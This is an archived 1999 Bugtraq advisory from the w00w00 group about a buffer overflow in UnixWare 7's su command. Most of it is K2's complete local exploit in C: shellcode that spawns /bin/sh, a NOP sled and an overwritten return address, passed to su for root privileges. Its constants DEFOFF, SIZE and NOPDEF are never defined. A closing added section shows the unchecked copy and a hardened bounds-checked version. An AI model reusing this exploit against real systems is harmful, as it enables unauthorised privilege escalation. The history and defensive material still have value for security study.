Bugtraq mailing list archives
[w00giving '99 #5 and w00news]: UnixWare 7's su
From: shok () CANNABIS DATAFORCE NET (Matt Conover)
Date: Fri, 26 Nov 1999 04:16:41 +0300
w00w00 Security Development (WSD)
http://www.w00w00.org/advisories.html
----------------------------------------------------------------------------

Sorry, we've been really tied up these past 2-3 weeks and have been unable
to write up the advisories. We'll send three SCO advisories tonight to make
up for it. We should have some interesting ones within the next two weeks
(it's really hard to find the time to write up the exploits and advisories).

You'll notice we jumped from #3 to #5. w00giving advisory #4 has been
available on http://www.w00w00.org/advisories.html for 2-3 weeks, but it
wasn't posted to this list. w00w00.org has had hits from 55 different
countries as of yesterday.

If you are going to send out advisories, please cc them to
news () technotronic com, also. You can subscribe to it by sending
"subscribe news" to majordomo () technotronic com. Technotronic is a good
site and beginning now, you will always see our advisories/articles/code
posted on there first (order of release: w00w00.org, news () technotronic com,
news groups, bugtraq).
----------------------------------------------------------------------------

Discovered by: K2 (ktwo () ktwo ca)

The su command on SCO's UnixWare 7 has improper bounds checking on the
username passed (via argv[1]), which can cause a buffer overflow when a
lengthy username is passed.
----------------------------------------------------------------------------

Exploit (by K2):

// UnixWare7 /usr/bin/su local, K2, revisited Oct-30-1999
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shell[] =
"\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
"\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
"\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
"\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
"\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
"\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";

const char x86_nop=0x90;
long nop,esp;
long offset=DEFOFF;
char buffer[SIZE];

long get_esp()
{
  __asm__("movl %esp,%eax");
}

int main (int argc, char *argv[])
{
  register int i;

  if (argc > 1) offset += strtol(argv[1], NULL, 0);
  if (argc > 2) nop += strtoul(argv[2], NULL, 0);
  else nop = NOPDEF;

  esp = get_esp();
  memset(buffer, x86_nop, SIZE);
  memcpy(buffer+nop, shell, strlen(shell));
  for (i = nop+strlen(shell); i < SIZE-4; i += 4)
    *((int *) &buffer[i]) = esp+offset;

  printf("offset = [0x%x]\n",esp+offset);
  execl("/usr/bin/su", "su", buffer, NULL);
  printf("exec failed!\n");
  return 0;
}

----------------------------------------------------------------------------

Patch:

SCO is in the process of fixing a list of vulnerabilities we sent a few
weeks ago.

----------------------------------------------------------------------------
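The missing bounds check the advisory describes, shown in an added example that is not SCO's su source or K2's code: a hypothetical username handler copies argv[1] into a fixed stack buffer without checking its length, and a hardened version rejects names that do not fit rather than truncating them (the buffer limit LOGIN_NAME_MAX_DEMO and all function names are constructed for the demo).

```c
/* Added example, not SCO's su source or K2's code: a hypothetical username
 * handler showing the unchecked copy of argv[1] into a fixed stack buffer
 * beside a hardened version. LOGIN_NAME_MAX_DEMO is a constructed limit. */
#include <stdio.h>
#include <string.h>

#define LOGIN_NAME_MAX_DEMO 32    /* constructed demo limit, not UnixWare's */
/* Vulnerable pattern (illustration only, never called below): the buffer
 * capacity is ignored, so a long argument overruns 'name' on the stack. */
void copy_username_unchecked(char *name, size_t cap, const char *arg)
{
    (void)cap;                    /* the missing bounds check */
    strcpy(name, arg);
}

/* Hardened version: refuse names that do not fit instead of truncating,
 * since truncation would let a long name beginning with "root" collapse
 * to "root". Returns 0 on success, -1 on reject with 'name' set to "". */
int copy_username_checked(char *name, size_t cap, const char *arg)
{
    const char *end;
    size_t len;
    if (cap == 0)
        return -1;
    name[0] = '\0';
    if (arg == NULL)
        return -1;
    end = memchr(arg, '\0', cap); /* look for the NUL within cap bytes only */
    if (end == NULL)              /* no terminator in range: too long */
        return -1;
    len = (size_t)(end - arg);
    if (len == 0)                 /* empty username is not a valid target */
        return -1;
    memcpy(name, arg, len + 1);   /* len < cap here, so the NUL fits */
    return 0;
}

/* Mirrors "su <name>": returns 0 if the argument fit the username buffer. */
int su_check_username(const char *arg)
{
    char name[LOGIN_NAME_MAX_DEMO];
    return copy_username_checked(name, sizeof name, arg);
}

int main(int argc, char *argv[])
{
    const char *arg = argc > 1 ? argv[1] : "k2";   /* constructed default */
    printf("%s: %s\n", arg, su_check_username(arg) == 0 ? "accepted" : "rejected");
    return 0;
}
```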